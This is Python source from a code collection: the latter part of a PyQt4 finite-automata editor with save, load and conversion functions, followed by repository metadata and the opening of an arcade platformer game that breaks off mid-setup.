        self.lineEdit_value.setGeometry(QtCore.QRect(20, 346, 211, 41))
        self.lineEdit_value.setObjectName(_fromUtf8("lineEdit_value"))
        self.label_2 = QtGui.QLabel(self.menu)
        self.label_2.setGeometry(QtCore.QRect(90, 320, 68, 17))
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.pushButton_save = QtGui.QPushButton(self.menu)
        self.pushButton_save.setGeometry(QtCore.QRect(10, 746, 221, 61))
        self.pushButton_save.setObjectName(_fromUtf8("pushButton_save"))
        self.pushButton_load = QtGui.QPushButton("Load", self.menu)
        self.pushButton_load.setGeometry(QtCore.QRect(10, 810, 221, 61))
        self.pushButton_load.setObjectName(_fromUtf8("pushButton_load"))
        self.label_3 = QtGui.QLabel(self.menu)
        self.label_3.setGeometry(QtCore.QRect(40, 670, 161, 20))
        self.label_3.setObjectName(_fromUtf8("label_3"))
        self.lineEdit_filename = QtGui.QLineEdit(self.menu)
        self.lineEdit_filename.setGeometry(QtCore.QRect(10, 700, 221, 41))
        self.lineEdit_filename.setObjectName(_fromUtf8("lineEdit_filename"))
        self.label_4 = QtGui.QLabel(self.menu)
        self.label_4.setGeometry(QtCore.QRect(100, 10, 68, 17))
        self.label_4.setObjectName(_fromUtf8("label_4"))
        # Type of the next node to be added (START/NORMAL/FINAL).
        self.comboBox_node_type = QtGui.QComboBox(self.menu)
        self.comboBox_node_type.setGeometry(QtCore.QRect(10, 410, 221, 51))
        self.comboBox_node_type.setObjectName(_fromUtf8("comboBox_node_type"))
        self.comboBox_node_type.addItem(_fromUtf8(""))
        self.comboBox_node_type.addItem(_fromUtf8(""))
        self.comboBox_node_type.addItem(_fromUtf8(""))
        # --- drawing canvas and its toolbar widgets -----------------------
        self.canvas = Canvas(self)
        self.canvas.setGeometry(QtCore.QRect(270, 10, 1221, 831))
        self.canvas.setObjectName(_fromUtf8("canvas"))
        self.lineEdit_eval = QtGui.QLineEdit(self.canvas)
        self.lineEdit_eval.setGeometry(QtCore.QRect(300, 10, 100, 40))
        self.lineEdit_eval.setObjectName(_fromUtf8("lineEdit_eval"))
        self.label_eval = QtGui.QLabel(self.canvas)
        self.label_eval.setGeometry(QtCore.QRect(200, 10, 80, 40))
        self.label_eval.setObjectName(_fromUtf8("label_eval"))
        self.pushButton_eval = QtGui.QPushButton("Evaluate", self.canvas)
        self.pushButton_eval.setGeometry(QtCore.QRect(750, 10, 100, 40))
        self.pushButton_eval.setObjectName(_fromUtf8("pushButton_eval"))
        self.label_regex = QtGui.QLabel("REGEX", self.canvas)
        self.label_regex.setGeometry(QtCore.QRect(450, 10, 100, 40))
        self.label_regex.setObjectName(_fromUtf8("label_regex"))
        self.lineEdit_regex = QtGui.QLineEdit("(0|(1(01*(00)*0)*1)*)*", self.canvas)
        self.lineEdit_regex.setGeometry(QtCore.QRect(500, 10, 200, 40))
        self.lineEdit_regex.setObjectName(_fromUtf8("lineEdit_regex"))
        self.pushButton_conv = QtGui.QPushButton("Convert", self.canvas)
        self.pushButton_conv.setGeometry(QtCore.QRect(850, 10, 100, 40))
        self.pushButton_conv.setObjectName(_fromUtf8("pushButton_conv"))
        # Publish the canvas and the window itself for the module-level helpers.
        global canvas
        global mainWidget
        canvas = self.canvas
        mainWidget = self
        self.retranslateUi()
        QtCore.QMetaObject.connectSlotsByName(self)

    def retranslateUi(self):
        """Set all user-visible texts, then finish initialisation via eventManager."""
        self.pushButton_edit.setText(_translate("MainWindow", "Editar", None))
        self.pushButton_delete.setText(_translate("MainWindow", "Borrar", None))
        self.pushButton_add.setText(_translate("MainWindow", "Agregar", None))
        self.comboBox_type.setItemText(0, _translate("MainWindow", "DFA", None))
        self.comboBox_type.setItemText(1, _translate("MainWindow", "NFA", None))
        self.comboBox_type.setItemText(2, _translate("MainWindow", "NFA EPSILON", None))
        self.comboBox_type.setItemText(3, _translate("MainWindow", "REGEX", None))
        self.label.setText(_translate("MainWindow", "Tipo", None))
        self.label_2.setText(_translate("MainWindow", "Valor", None))
        self.pushButton_save.setText(_translate("MainWindow", "Guardar", None))
        self.label_3.setText(_translate("MainWindow", " Nombre del Archivo", None))
        self.label_4.setText(_translate("MainWindow", "Menu", None))
        self.comboBox_node_type.setItemText(0, _translate("MainWindow", "START", None))
        self.comboBox_node_type.setItemText(1, _translate("MainWindow", "NORMAL", None))
        self.comboBox_node_type.setItemText(2, _translate("MainWindow", "FINAL", None))
        self.label_eval.setText(_translate("MainWindow", "EVALUATE", None))
        self.lineEdit_value.setText("Q0")
        self.eventManager()

    def eventManager(self):
        """Initialise edit-state fields and connect widget signals to handlers."""
        self.DFA = 0
        self.NFA = 1
        self.NFA_E = 2
        self.START = 0
        self.NORMAL = 1
        self.FINAL = 2
        self.nodeTypeSelected = "NORMAL"
        self.fsmSelected = "DFA"
        # Bug fix: this assignment was duplicated; once is enough.
        self.canvas.mousePressEvent = self.mousePressEvent
        self.setAcceptDrops(True)
        self.pushButton_add.clicked.connect(self.add)
        self.pushButton_edit.clicked.connect(self.edit)
        self.pushButton_delete.clicked.connect(self.delete)
        self.pushButton_save.clicked.connect(self.save)
        self.pushButton_load.clicked.connect(self.load)
        self.pushButton_eval.clicked.connect(evaluate)
        self.pushButton_conv.clicked.connect(convert)
        self.pushButton_deselect.clicked.connect(self.node_deselect)
        self.comboBox_type.currentIndexChanged.connect(self.changeType)
        self.comboBox_node_type.currentIndexChanged.connect(self.changeNodeType)

    def mousePressEvent(self, QMouseEvent):
        """Canvas press handler; currently only grabs the cursor object."""
        cursor = QtGui.QCursor()

    def mouseReleaseEvent(self, QMouseEvent):
        """Canvas release handler; currently only grabs the cursor object."""
        cursor = QtGui.QCursor()

    def save(self):
        """Pickle the current automaton (nodes, connections, alphabet, eval
        string, symbols) to a file chosen in a save dialog."""
        print( "save")
        dlg = QtGui.QFileDialog()
        dlg.setFileMode(QtGui.QFileDialog.AnyFile)
        if dlg.exec_():
            filenames = dlg.selectedFiles()
            print( "Seleccionado ", filenames[0])
            filehandler = open(filenames[0], 'wb')
            # Serialize plain dicts instead of the Qt widgets themselves.
            saveNodeList = []
            saveConList = []
            for node in nodeList:
                saveNodeList.append( { "first": node.first , "final": node.final , "img": node.img , "name": str(node.label.text()), "x":node.x(), "y":node.y() } )
            pickle.dump( saveNodeList , filehandler)
            for con in conList:
                saveConList.append( { "name":con.name , "same":con.same , "node": str(con.node.label.text()) , "nextNode":str(con.nextNode.label.text()) } )
            pickle.dump( saveConList , filehandler)
            pickle.dump( alphabet , filehandler)
            pickle.dump( self.lineEdit_eval.text() , filehandler)
            pickle.dump( symbols , filehandler)

    def load(self, test = False):
        """Load an automaton pickled by save(); clears the canvas first.

        When *test* is True the file dialog is skipped and the module-level
        ``testFilename`` is loaded directly (used at start-up).
        """
        print( "load")
        global startNode
        global evalValue
        global nodeList
        global conList
        global symbols
        global alphabet  # bug fix: the loaded alphabet was dropped into a local before
        # Clear the current canvas. Iterate over snapshots: Node.delNode()
        # removes elements from nodeList while we walk it (the previous direct
        # iteration skipped every other node).
        for con in list(conList):
            try:
                con.node.delNode()
            except:
                print("err del node from con")
            try:
                con.nextNode.delNode()
            except:
                print("err del nextNode from con")
        for node in list(nodeList):
            try:
                node.delNode()
            except:
                print("err del node from nodeList")
        dlg = QtGui.QFileDialog()
        dlg.setFileMode(QtGui.QFileDialog.AnyFile)
        # dlg.setFilter("Text files (*.*)")
        filenames = []
        windowOpened = False
        if not test:
            windowOpened = dlg.exec_()
            filenames = dlg.selectedFiles()
        else:
            filenames = [testFilename]
        if windowOpened or test:
            filehandler = open(filenames[0], 'rb')
            loadNodeList = pickle.load( filehandler )
            conNodeList = pickle.load( filehandler )
            # Recreate the nodes first so connections can be resolved by name.
            for n in loadNodeList :
                new_node = Node(self.canvas, n["first"], n["final"], n["img"], n["name"] )
                new_node.moveNode(QtCore.QPoint(n['x'], n['y']))
                if n["first"]:
                    startNode = new_node
            for c in conNodeList :
                conNode = findNode( c["node"] )
                conNextNode = findNode( c["nextNode"])
                newCon = Connection(conNode , conNextNode , c["same"] )
                newCon.name = c["name"]
                conNode.connections.append(newCon)
                conList.append(newCon)
            alphabet = pickle.load(filehandler)
            evalValue = pickle.load(filehandler)
            symbols = pickle.load( filehandler)
            self.lineEdit_eval.setText(evalValue)

    def checkNodeExist(self, value):
        """Return True if a node named *value* is already on the canvas."""
        for node in nodeList:
            # print( "checking ", node.label.text(), " - ", value)
            if(node.label.text() == value):
                return True
        return False

    def checkConExist(self, node, value):
        """Return True if *node* already has an outgoing connection labelled *value*."""
        for con in node.connections:
            # print( "checking ", con.name , " - ", value)
            if(con.name == value):
                return True
        return False

    def add(self):
        """Create a node named after the value field, using the selected node type.

        At most one START node is allowed; node names must be unique.
        """
        global startNode
        value = self.lineEdit_value.text()
        if self.checkNodeExist(value):
            showMsg("Already Exist")
            print( "Exist")
        else:
            isFinal = False
            isStart = False
            nodeType = self.comboBox_node_type.currentText().lower()
            if(nodeType == "start"):
                isStart = True
                if startNode != None:
                    showMsg("Already a start point")
                    return
            elif(nodeType == "final"):
                print( "Final Node Created")
                isFinal = True
            else:
                print( "Normal Node Created")
            # The sprite image is derived from the node type (start/normal/final).
            filename = nodeType+".png"
            new_node = Node(self.canvas, isStart, isFinal, filename, value )
            if(isStart):
                startNode = new_node
                print( "Start Node Created")
            print( "Node List: ", len(nodeList))
            # Suggest the next default name (Q<count>).
            mainWidget.lineEdit_value.setText("Q"+str(len(nodeList)))
            # print( "add ", new_label, filename)
        deselectGlobalNodes()

    def edit(self):
        """Rename the selected node, or relabel the selected connection,
        to the text in the value field (names must stay unique)."""
        global action
        action = "EDIT"
        print ("edit")
        value = mainWidget.lineEdit_value.text()
        option = mainWidget.comboBox_edit_type.currentText()
        print( "OPTION: ", option)
        if option == "NODE" :
            if currNode != None:
                if self.checkNodeExist(value):
                    showMsg("Already Exist")
                else:
                    currNode.label.setText(value)
        elif option == "CONNECTION":
            action = "EDIT_CON"
            index = self.comboBox_con.currentIndex()
            print( "edit_con ", self.comboBox_con.currentText() , " index ", index)
            if( index != -1 ):
                if currNode != None:
                    if self.checkConExist(currNode, value):
                        showMsg("Already Exist")
                    else:
                        currNode.connections[index].name = self.lineEdit_value.text()
        deselectGlobalNodes()

    def node_deselect(self):
        """Clear the current node selection (menu "Deselect" button)."""
        deselectGlobalNodes()

    def delete(self):
        """Delete the selected node, or the connection chosen in the combo box."""
        global action
        option = mainWidget.comboBox_edit_type.currentText()
        print ("OPTION: ", option)
        if( option == "NODE" ):
            action = "DEL"
            if currNode != None:
                currNode.delNode()
            print( "delete")
        elif option == "CONNECTION":
            action = "DEL_CON"
            index = self.comboBox_con.currentIndex()
            print( "Del_con ", self.comboBox_con.currentText() , " index ", index)
            if( index != -1 ):
                conList[index].delCon(currNode)
        deselectGlobalNodes()

    def changeType(self, i):
        """Slot for the automaton-type combo box (currently informational only)."""
        if i == self.DFA:
            typeName = 'DFA'
        elif i == self.NFA:
            typeName = 'NFA'
        elif i == self.NFA_E:
            typeName = 'NFA EPSILON'
        # print( "change: ", i, typeName ,self.comboBox_type.currentText())
        # self.fsmSelected = typeName

    def changeNodeType(self, i):
        """Slot for the node-type combo box; records the chosen type name."""
        if i == self.START:
            typeName = 'START'
        elif i == self.NORMAL:
            typeName = 'NORMAL'
        elif i == self.FINAL:
            typeName = 'FINAL'
        # print( "change: ", i, typeName ,self.comboBox_node_type.currentText())
        self.fsmSelected = typeName

    def dragEnterEvent(self, e):
        """Accept any drag entering the window."""
        e.accept()
        # print( "DRAG")

    def dropEvent(self, e):
        """Move the dragged widget to the drop position.

        NOTE(review): references ``self.button``, which is never created in
        setupUi — confirm whether this handler is reachable.
        """
        position = e.pos()
        self.button.move(position)
        e.setDropAction(QtCore.Qt.MoveAction)
        e.accept()
        # print( "DROP")
class Connection():
    """Directed transition between two Node widgets, labelled with a symbol.

    The label is read from the menu's value field at creation time and each
    edge gets a random color so overlapping edges stay distinguishable.
    """
    def __init__(self, node, nextNode, same):
        self.node = node            # source Node
        self.nextNode = nextNode    # destination Node
        self.same = same            # True for a self-loop
        self.deleted = False
        self.name = mainWidget.lineEdit_value.text()
        self.red = randint(0, 255)
        self.green = randint(0, 255)
        self.blue = randint(0, 255)
    def delCon(self, node):
        """Remove this connection from the global list and from *node*'s list."""
        self.deleted = True
        conList.remove(self)
        node.connections.remove(self);
        mainWidget.update()
        # NOTE(review): `del self` only unbinds the local name; the object is
        # actually freed once all other references are dropped.
        del self
        print( "Con List: ", len(conList))
class Node(QtGui.QLabel):
    """Draggable automaton state widget.

    A Node is a 50x50 sprite plus a separate name label and a highlight
    ("selected") image. It registers itself in the global nodeList and keeps
    its outgoing Connection objects in ``self.connections``.

    Fixes vs. the previous revision:
      * the base class was initialised twice (``QLabel.__init__`` plus
        ``super().__init__``) — a single cooperative call is enough;
      * ``mouseReleaseEvent`` called an undefined ``doSomething()``, which
        raised NameError on every release (swallowed by the broad except)
        and made the whole drop-handling path dead code.
    """
    def __init__(self, parent, first, final, img, name):
        super(Node, self).__init__(parent=parent)
        self.connections = []      # outgoing Connection objects
        self.deleted = False
        self.setAcceptDrops(True)
        self.setPixmap(QtGui.QPixmap(_fromUtf8(img)))
        self.setScaledContents(True)
        self.setGeometry(QtCore.QRect(0, 0, 50, 50))
        self.move(50, 50)
        self.show()
        # Highlight ring shown while this node is the current selection.
        self.selected = QtGui.QLabel(parent)
        self.selected.setScaledContents(True)
        self.selected.setPixmap(QtGui.QPixmap(_fromUtf8("select.png")))
        self.selected.setGeometry(QtCore.QRect(0, 0, 80, 80))
        self.selected.move(35, 35)
        # Visible state name, drawn just below the sprite.
        self.label = QtGui.QLabel(name, parent)
        self.label.move(45, 100)
        self.label.show()
        nodeList.append(self)
        self.first = first         # True if this is the start state
        self.final = final         # True if this is an accepting state
        self.name = name
        self.img = img
    def moveNode(self, pos):
        """Move the sprite and keep the highlight ring and name label attached."""
        self.move(pos)
        x = pos.x()
        y = pos.y()
        self.selected.move(x - 15, y - 15)
        self.label.move(x + 10, y + 65)
    def delNode(self):
        """Hide and unregister this node; clears the global start node if needed."""
        self.deleted = True
        self.label.hide()
        self.selected.hide()
        self.hide()
        mainWidget.update()
        if(self.first):
            global startNode
            startNode = None
        print( "Deleting from List ", nodeList.remove(self))
        del self.label
        del self.selected
        del self
        print ("Node List: ", len(nodeList))
    def showSelected(self):
        """Show the highlight ring and raise the sprite above its siblings."""
        self.selected.show()
        self.raise_()
    def hideSelected(self):
        """Hide the highlight ring."""
        self.selected.hide()
    def mousePressEvent(self, event):
        """Handle the pending menu action, or start a drag, then select this node."""
        global action
        if(action == "EDIT"):
            print( "EDIT")
        if(action == "EDIT_CON"):
            print( "EDIT_CON")
        elif(action == 'DEL'):
            print ("DEL")
        else:
            # No pending action: remember the press position for dragging.
            self.__mousePressPos = None
            self.__mouseMovePos = None
            if event.button() == QtCore.Qt.LeftButton:
                self.__mousePressPos = event.globalPos()
                self.__mouseMovePos = event.globalPos()
            super(Node, self).mousePressEvent(event)
        selectGlobalNodes(self)
        action = ""
    def mouseMoveEvent(self, event):
        """Drag the node with the left button, repainting connections as it moves."""
        if event.buttons() == QtCore.Qt.LeftButton:
            # adjust offset from clicked point to origin of widget
            currPos = self.mapToGlobal(self.pos())
            globalPos = event.globalPos()
            diff = globalPos - self.__mouseMovePos
            newPos = self.mapFromGlobal(currPos + diff)
            deselectGlobalNodes()
            self.moveNode(newPos)
            self.__mouseMovePos = globalPos
            mainWidget.repaint()
        super(Node, self).mouseMoveEvent(event)
    def mouseReleaseEvent(self, event):
        """Finish a drag; ignore the event if the node barely moved (a click)."""
        try:
            # (Bug fix: the undefined doSomething() call that used to sit here
            # aborted this handler on every release.)
            if self.__mousePressPos is not None:
                moved = event.globalPos() - self.__mousePressPos
                if moved.manhattanLength() > 3:
                    event.ignore()
                    return
            print( "DROP")
            mainWidget.repaint()
            mainWidget.update()
            super(Node, self).mouseReleaseEvent(event)
        except Exception:
            # Best-effort: e.g. the press attributes may not exist when the
            # press was consumed by an edit/delete action.
            print( "")
def selectGlobalNodes(node):
    """First click selects *node*; a second click connects the pair.

    Selecting also fills the menu's connection combo box with the node's
    outgoing transition labels.
    """
    global currNode
    global nextNode
    if(currNode == None):
        currNode = node
        currNode.showSelected()
        for con in currNode.connections:
            mainWidget.comboBox_con.addItem(con.name)
        # print( 'First Node: ', currNode)
    else:
        nextNode = node
        connectNodes(node)
        deselectGlobalNodes()
        print( 'Second Label', nextNode)
def deselectGlobalNodes():
    """Clear the current selection pair and refresh the menu and canvas."""
    global currNode
    global nextNode
    try:
        currNode.hideSelected()
        nextNode.hideSelected()
    except:
        # Either node may be None (or already deleted); nothing to hide then.
        pass
    currNode = None
    nextNode = None
    mainWidget.comboBox_con.clear()
    mainWidget.canvas.repaint()
    mainWidget.canvas.update()
def connectNodes(nextNode):
    """Create a Connection from the currently selected node to *nextNode*.

    The transition symbol is read from the menu's value field. For DFAs a
    duplicate outgoing symbol is rejected (determinism); self-loops are
    allowed and recorded via *isSame*.
    """
    if(currNode != None and mainWidget.comboBox_edit_type.currentText() != "CONNECTION"):
        if(currNode == nextNode):
            isSame = True
        else:
            isSame = False
        if mainWidget.checkConExist(currNode, mainWidget.lineEdit_value.text()) and mainWidget.comboBox_type.currentText() == "DFA":
            showMsg("Already Exist")
        else:
            newCon = Connection(currNode, nextNode, isSame)
            currNode.connections.append(newCon)
            conList.append(newCon)
            mainWidget.update()
            print( "Conecting")
    else:
        print( "Seleccione un nodo")
def showMsg(text):
    """Pop up a modal information dialog showing *text* with a single Yes button."""
    msgBox = QtGui.QMessageBox( mainWidget )
    msgBox.setIcon( QtGui.QMessageBox.Information )
    msgBox.setText( text )
    # msgBox.setInformativeText( "Do you really want?" )
    # msgBox.addButton( QtGui.QMessageBox.No )
    msgBox.addButton( QtGui.QMessageBox.Yes )
    msgBox.setDefaultButton( QtGui.QMessageBox.Yes )
    ret = msgBox.exec_()
    # if ret == QtGui.QMessageBox.Yes:
    # print( "Yes" )
    # return
    # else:
    # print( "No" )
    # return
def is_final(name):
    """Report whether the state called *name* is an accepting (final) state.

    Also records a human-readable outcome in the module-level ``Result``.
    """
    global Result
    for candidate in nodeList:
        if candidate.label.text() == name and candidate.final:
            Result = "Succesful, Last: " + name
            return True
    Result = "Failed, Last: " + name
    return False
def getStates():
    """Return the set of all state names currently on the canvas."""
    return {str(node.label.text()) for node in nodeList}
def getFinalStates():
    """Return the set of names of accepting states, logging them on the way."""
    finals = {str(node.label.text()) for node in nodeList if node.final}
    print("final States ", str(finals))
    return finals
def findNode(name):
    """Return the Node whose label equals *name*, or None if no such node exists."""
    matches = (node for node in nodeList if str(node.label.text()) == name)
    return next(matches, None)
def get_events():
    """Return every transition as ``[symbol, from_state, to_state]``, logging each."""
    events = []
    for con in conList:
        symbol = str(con.name)
        src = str(con.node.label.text())
        dst = str(con.nextNode.label.text())
        print( src, " --", symbol, "--> ", dst)
        events.append([symbol, src, dst])
    return events
def get_transitions():
    """Build a ``state -> {symbol: next_state}`` transition table.

    Symbols with no explicit outgoing connection default to a self-loop.
    Bug fix: the previous revision probed ``transitions[k]`` inside a
    ``try`` whose only live statement was ``pass`` (the probe line was
    commented out), so ``KeyError`` could never fire and the self-loop
    default was never installed.
    """
    keys = {}
    for node in nodeList:
        state = str(node.label.text())
        transitions = {}
        for con in node.connections:
            transitions[con.name] = str(con.nextNode.label.text())
        for k in symbols:
            if k not in transitions:
                transitions[k] = state
        keys[state] = transitions
    return keys
def createDFA():
    """Translate the canvas nodes/connections into a DFA object."""
    automaton = DFA("newDFA", alphabet)
    print("nodes addState")
    for node in nodeList:
        automaton.addState(str(node.label.text()), node.first, node.final)
    for con in conList:
        automaton.addTransition(str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()))
    return automaton
def createNFA():
    """Translate the canvas nodes/connections into an NFA object."""
    automaton = NFA("newNFA", alphabet)
    print("nodes addState")
    for node in nodeList:
        automaton.addState(str(node.label.text()), node.first, node.final)
    for con in conList:
        automaton.addTransition(str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()))
    return automaton
def createNFAe():
    """Translate the canvas nodes/connections into an epsilon-NFA object."""
    automaton = NFAe("newNFAe", alphabet)
    print("nodes addState")
    for node in nodeList:
        automaton.addState(str(node.label.text()), node.first, node.final)
    for con in conList:
        automaton.addTransition(str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()))
    return automaton
def evaluateREGEX():
    """Check the eval string against the regex typed in the UI.

    Bug fix: uses ``fullmatch`` instead of ``match`` — a regular expression
    (like the automata it is compared against) accepts a word only if the
    *entire* word matches, whereas ``re.match`` succeeds on any matching
    prefix. The pattern is also compiled once and reused.
    """
    regex = str( mainWidget.lineEdit_regex.text() )
    pattern = re.compile( regex )
    print("REGEX ", pattern.fullmatch( evalValue ) )
    if pattern.fullmatch( evalValue ) is not None:
        msg = evalValue+" succesfully pass "+regex
    else:
        msg = evalValue+" failed "+regex
    showMsg(msg)
def evaluate():
    """Run the eval string through the automaton type selected in the UI.

    Builds a fresh automaton from the canvas, evaluates the input and pops
    up the resulting final state. REGEX delegates to evaluateREGEX().
    """
    print("Events "+mainWidget.comboBox_type.currentText() )
    get_events()
    # NOTE(review): this binds a *local* evalValue (no `global` statement),
    # shadowing the module-level one used by evaluateREGEX().
    evalValue = str(mainWidget.lineEdit_eval.text())
    automata = None
    if mainWidget.comboBox_type.currentText() == "DFA":
        automata = createDFA()
    elif mainWidget.comboBox_type.currentText() == "NFA":
        automata = createNFA()
    elif mainWidget.comboBox_type.currentText() == "NFA EPSILON":
        automata = createNFAe()
    elif mainWidget.comboBox_type.currentText() == "REGEX":
        evaluateREGEX()
        return
    msg = "Evaluating " + evalValue + " last state " + automata.match( evalValue ).label
    showMsg(msg)
def convert():
    """Dispatch the conversion matching the automaton type selected in the UI."""
    selected = mainWidget.comboBox_type.currentText()
    print("CONVERT "+selected)
    get_events()
    evalValue = str(mainWidget.lineEdit_eval.text())  # kept for parity with evaluate()
    converters = {
        "DFA": DFAtoREGEX,
        "NFA": NFAtoDFA,
        "NFA EPSILON": NFAetoDFA,
        "REGEX": REGEXtoNFAe,
    }
    handler = converters.get(str(selected))
    if handler is not None:
        handler()
def NFAtoDFA():
    """Replace the canvas NFA with its equivalent DFA and switch the UI type."""
    print("convert NFA to DFA")
    converted = createNFA().toDFA()
    regenerateAutomata(converted)
    mainWidget.comboBox_type.setCurrentIndex(0)  # index 0 == "DFA"
def NFAetoDFA():
    """Replace the canvas epsilon-NFA with its equivalent DFA and switch the UI type."""
    print("convert NFAe to DFA")
    converted = createNFAe().toDFA()
    regenerateAutomata(converted)
    mainWidget.comboBox_type.setCurrentIndex(0)  # index 0 == "DFA"
def DFAtoREGEX():
    """Convert the canvas DFA to a regular expression and show it in the UI."""
    print("DFA to REGEX")
    conversion = createDFA().toRE()
    # print("toRE ", conversion['regex'], " - ", conversion["stepByStep"] )
    showMsg("DFA to RE: " + conversion['regex'])
    mainWidget.lineEdit_regex.setText(conversion['regex'])
    mainWidget.comboBox_type.setCurrentIndex(3)  # index 3 == "REGEX"
def REGEXtoNFAe():
    """Build an epsilon-NFA from the regex in the UI via AutomataLib.RegExp
    and redraw it on the canvas."""
    print("REGEX to NFAe")
    nfaLib = AutomataLib.RegExp( str(mainWidget.lineEdit_regex.text() ) )
    print( "NFA ", nfaLib )
    newNFA = NFAe("newNFA", alphabet)
    # Mirror the library automaton's states, prefixing names with "Q".
    for s in nfaLib.states() :
        print("state ", s)
        newNFA.addState( "Q"+str(s), s in nfaLib.initial, nfaLib.isfinal(s) )
    # for con in conList:
    # newNFA.addTransition( str(con.name), str(con.node.label.text()), str(con.nextNode.label.text()) )
    for s in nfaLib.states() :
        for c in nfaLib.alphabet:
            for neighbor in nfaLib.transition(s,c):
                # The library spells epsilon as '|'; this application uses 'E'.
                if str(c) == '|':
                    c = 'E'
                print( s ," --[" + str(c) + "]-->", neighbor )
                newNFA.addTransition(str(c) , "Q"+str(s), "Q"+str(neighbor) )
    regenerateAutomata(newNFA)
    mainWidget.comboBox_type.setCurrentIndex(2)  # index 2 == "NFA EPSILON"
def regenerateAutomata(automata):
    """Replace the canvas contents with the states/transitions of *automata*.

    States are placed at random positions; the layout can be tidied up by
    dragging the nodes afterwards.
    """
    print( "Regenerate")
    global startNode
    global evalValue
    global nodeList
    global conList
    global symbols
    emptyLists()
    for s in automata.states:
        # Pick the sprite matching the state's role.
        img = "normal.png"
        if s.isInitial:
            img = "start.png"
        elif s.isFinal:
            img = "final.png"
        randomX = randint(30, 800)
        randomY = randint(30, 600)
        new_node = Node(canvas, s.isInitial , s.isFinal , img, s.label )
        new_node.moveNode(QtCore.QPoint( randomX , randomY ))
        if s.isInitial:
            startNode = new_node
    # Second pass: recreate the edges once every node exists.
    for s in automata.states:
        for t in s.transitions:
            conNode = findNode( t._from )
            conNextNode = findNode( t._to )
            newCon = Connection(conNode , conNextNode , t._from == t._to )
            newCon.name = t.label
            conNode.connections.append(newCon)
            conList.append(newCon)
def emptyLists():
    """Delete every node (and with it, every connection) from the canvas.

    Bug fix: the previous revision iterated ``nodeList`` directly while
    ``Node.delNode()`` removes elements from that same list, which skipped
    every other node; iterating over snapshots makes the teardown complete.
    """
    for con in list(conList):
        try:
            con.node.delNode()
        except:
            print("err del node from con")
        try:
            con.nextNode.delNode()
        except:
            print("err del nextNode from con")
    for node in list(nodeList):
        try:
            node.delNode()
        except:
            print("err del node from nodeList")
# Script entry point: build the UI, preload the demo automaton from
# testFilename (load(True)) and hand control to the Qt event loop.
if __name__ == '__main__':
    ui = Ui_MainWindow()
    ui.setupUi()
    ui.show()
    ui.load(True)
    sys.exit(app.exec_())
"noreply@github.com"
] | rubencg195.noreply@github.com |
639eb6874b95a9e96a37069b983815ce6ac2bc13 | 227c102ed508ad2b1d046340dcb598a7b16e2925 | /.history/Forritun/Verkefni með einkunn/Lokaverkefni/lokaverkefni_20201208144514.py | abaca0b10d37452fa155d2847cc3949d691d5db1 | [] | no_license | larusarmann/Skoli-haust-2020 | 298e48f1c20d7ec0c92124018650253f13bcbb2f | 3061a0238b74919daccaa74117bc1c32b3436619 | refs/heads/master | 2023-02-07T09:15:45.493928 | 2020-12-09T19:46:53 | 2020-12-09T19:46:53 | 292,543,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,104 | py | """
Show how to do enemies in a platformer
Artwork from: http://kenney.nl
Tiled available from: http://www.mapeditor.org/
If Python and Arcade are installed, this example can be run from the command line with:
python -m arcade.examples.sprite_enemies_in_platformer
"""
import random
import arcade
import os
# --- Tunable game constants ------------------------------------------------
SPRITE_SCALING_coin=12     # NOTE(review): unused; coins are created with SPRITE_SCALING / 2
SPRITE_SCALING = 0.5       # scale applied to the 128 px source sprites
SPRITE_NATIVE_SIZE = 128   # native size (px) of the sprite artwork
SPRITE_SIZE = int(SPRITE_NATIVE_SIZE * SPRITE_SCALING)
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_TITLE = "Lárus"
VIEWPORT_MARGIN = 40       # scroll when the player gets this close to a screen edge
RIGHT_MARGIN = 150         # NOTE(review): unused in this chunk
MOVEMENT_SPEED = 5         # horizontal speed, px per frame
JUMP_SPEED = 14            # initial vertical speed of a jump
GRAVITY = 0.5              # downward acceleration per frame
class MyGame(arcade.Window):
    """ Main application class: a small scrolling platformer.

    The player collects coins; a start screen is shown until Q is pressed,
    and an end screen once five coins have been collected.
    """
    def __init__(self):
        """
        Initialize window state; sprite lists are created later in setup().
        """
        super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, "Lokaverkefni Lárus")
        # Sprite lists
        self.coin_list = None
        self.player_list = None
        self.wall_list = None
        self.flag=True              # True while the start screen is showing
        self.score = 0              # coins collected so far
        # Set up the player
        self.player_sprite = None
        # This variable holds our simple "physics engine"
        self.physics_engine = None
        # Manage the view port
        self.view_left = 0
        self.view_bottom = 0
    def setup(self):
        """ Set up the game and initialize the variables. """
        self.wall_list = arcade.SpriteList()
        self.enemy_list = arcade.SpriteList()
        self.player_list = arcade.SpriteList()
        self.coin_list = arcade.SpriteList()
        # Ground row across the bottom of the screen.
        for x in range(0, SCREEN_WIDTH, SPRITE_SIZE):
            wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
            wall.bottom = 0
            wall.left = x
            self.wall_list.append(wall)
        # Draw the platform
        for x in range(SPRITE_SIZE * 3, SPRITE_SIZE * 8, SPRITE_SIZE):
            wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/rpgTile019.png", SPRITE_SCALING)
            wall.bottom = SPRITE_SIZE * 3
            wall.left = x
            self.wall_list.append(wall)
        # Draw the crates
        for x in range(0, SCREEN_WIDTH, SPRITE_SIZE * 5):
            wall = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/boxCrate_double.png", SPRITE_SCALING)
            wall.bottom = SPRITE_SIZE
            wall.left = x
            self.wall_list.append(wall)
        # Scatter the collectible coins at random positions.
        for i in range(7):
            # Create the coin instance
            coin = arcade.Sprite("C:\Git\Skoli-haust-2020\Forritun\Verkefni með einkunn\Lokaverkefni\images\coinGold.png", SPRITE_SCALING / 2)
            # Position the coin
            coin.center_x = random.randrange(SCREEN_WIDTH)
            coin.center_y = random.randrange(600)
            # Add the coin to the lists
            self.coin_list.append(coin)
        # -- Draw an enemy on the ground
        enemy = arcade.Sprite("C:/Git/Skoli-haust-2020/Forritun/Verkefni með einkunn/Lokaverkefni/images/character_zombie_idle.png", SPRITE_SCALING)
        enemy.bottom = SPRITE_SIZE
